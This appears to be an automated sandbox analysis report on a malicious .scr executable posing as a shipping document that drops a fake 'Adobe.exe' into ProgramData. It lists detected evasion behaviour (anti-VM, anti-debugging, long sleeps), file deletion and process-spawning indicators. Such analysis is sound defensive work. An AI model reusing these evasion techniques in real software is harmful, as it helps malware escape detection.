                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe PID: 3668, type: MEMORYSTR
                    Delayed program exit found
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_0040E54F Sleep,ExitProcess,3_2_0040E54F
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeMemory allocated: 2B10000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeMemory allocated: 2D70000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeMemory allocated: 2B10000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeMemory allocated: 8F90000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeMemory allocated: 9F90000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeMemory allocated: A1A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeMemory allocated: B1A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeMemory allocated: 940000 memory reserve | memory write watchJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeMemory allocated: 2490000 memory reserve | memory write watchJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeMemory allocated: 4490000 memory reserve | memory write watchJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeMemory allocated: 81A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeMemory allocated: 91A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeMemory allocated: 9390000 memory reserve | memory write watchJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeMemory allocated: A390000 memory reserve | memory write watchJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeMemory allocated: 2D00000 memory reserve | memory write watchJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeMemory allocated: 2EA0000 memory reserve | memory write watchJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeMemory allocated: 4EA0000 memory reserve | memory write watchJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeMemory allocated: 8CF0000 memory reserve | memory write watchJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeMemory allocated: 9CF0000 memory reserve | memory write watchJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeMemory allocated: 9EF0000 memory reserve | memory write watchJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeMemory allocated: AEF0000 memory reserve | memory write watchJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeMemory allocated: B40000 memory reserve | memory write watchJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeMemory allocated: 27C0000 memory reserve | memory write watchJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeMemory allocated: 47C0000 memory reserve | memory write watchJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeMemory allocated: 8970000 memory reserve | memory write watchJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeMemory allocated: 8290000 memory reserve | memory write watchJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeMemory allocated: 9970000 memory reserve | memory write watchJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeMemory allocated: A970000 memory reserve | memory write watchJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeMemory allocated: 1510000 memory reserve | memory write watchJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeMemory allocated: 2FA0000 memory reserve | memory write watchJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeMemory allocated: 2DA0000 memory reserve | memory write watchJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeMemory allocated: 8EE0000 memory reserve | memory write watchJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeMemory allocated: 8AD0000 memory reserve | memory write watchJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeMemory allocated: 9EE0000 memory reserve | memory write watchJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeMemory allocated: AEE0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,3_2_004198C2
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeWindow / User API: threadDelayed 4500Jump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeWindow / User API: threadDelayed 5494Jump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeEvaded block: after key decisiongraph_3-47790
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeEvaded block: after key decisiongraph_3-47767
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeAPI coverage: 5.3 %
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe TID: 2436Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exe TID: 2228Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exe TID: 6036Thread sleep count: 4500 > 30Jump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exe TID: 6036Thread sleep time: -13500000s >= -30000sJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exe TID: 6036Thread sleep count: 5494 > 30Jump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exe TID: 6036Thread sleep time: -16482000s >= -30000sJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exe TID: 3876Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exe TID: 2108Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exe TID: 4444Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,3_2_0040B335
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,3_2_0041B42F
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,3_2_0040B53A
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_0044D5E9 FindFirstFileExA,3_2_0044D5E9
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,3_2_004089A9
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_00406AC2 FindFirstFileW,FindNextFileW,3_2_00406AC2
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,3_2_00407A8C
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,3_2_00418C69
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,3_2_00408DA7
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,3_2_00406F06
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: Adobe.exe, 00000007.00000002.4507004110.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp, Adobe.exe, 00000007.00000002.4507004110.0000000000E37000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0043A65D
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,3_2_0041BCE3
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_00442554 mov eax, dword ptr fs:[00000030h]3_2_00442554
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_0044E92E GetProcessHeap,3_2_0044E92E
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_00434168 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00434168
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0043A65D
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_00433B44 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00433B44
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_00433CD7 SetUnhandledExceptionFilter,3_2_00433CD7
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeMemory allocated: page read and write | page guardJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe3_2_00410F36
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_00418754 mouse_event,3_2_00418754
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeProcess created: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe "C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeProcess created: C:\ProgramData\Adobe\Adobe.exe "C:\ProgramData\Adobe\Adobe.exe" Jump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess created: C:\ProgramData\Adobe\Adobe.exe "C:\ProgramData\Adobe\Adobe.exe"Jump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess created: C:\ProgramData\Adobe\Adobe.exe "C:\ProgramData\Adobe\Adobe.exe"Jump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess created: C:\ProgramData\Adobe\Adobe.exe "C:\ProgramData\Adobe\Adobe.exe"Jump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess created: C:\ProgramData\Adobe\Adobe.exe "C:\ProgramData\Adobe\Adobe.exe"Jump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess created: C:\ProgramData\Adobe\Adobe.exe "C:\ProgramData\Adobe\Adobe.exe"Jump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess created: C:\ProgramData\Adobe\Adobe.exe "C:\ProgramData\Adobe\Adobe.exe"Jump to behavior
                    Source: Adobe.exe, 00000007.00000002.4507004110.0000000000E91000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                    Source: Adobe.exe, 00000007.00000002.4507004110.0000000000E91000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerW
                    Source: Adobe.exe, 00000007.00000002.4507004110.0000000000E6F000.00000004.00000020.00020000.00000000.sdmp, Adobe.exe, 00000007.00000002.4507004110.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp, Adobe.exe, 00000007.00000002.4507004110.0000000000E37000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_00433E0A cpuid 3_2_00433E0A
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: EnumSystemLocalesW,3_2_004470AE
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: GetLocaleInfoW,3_2_004510BA
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_004511E3
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: GetLocaleInfoW,3_2_004512EA
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,3_2_004513B7
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: GetLocaleInfoW,3_2_00447597
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: GetLocaleInfoA,3_2_0040E679
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,3_2_00450A7F
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: EnumSystemLocalesW,3_2_00450CF7
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: EnumSystemLocalesW,3_2_00450D42
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: EnumSystemLocalesW,3_2_00450DDD
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,3_2_00450E6A
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeQueries volume information: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeQueries volume information: C:\ProgramData\Adobe\Adobe.exe VolumeInformationJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeQueries volume information: C:\ProgramData\Adobe\Adobe.exe VolumeInformationJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
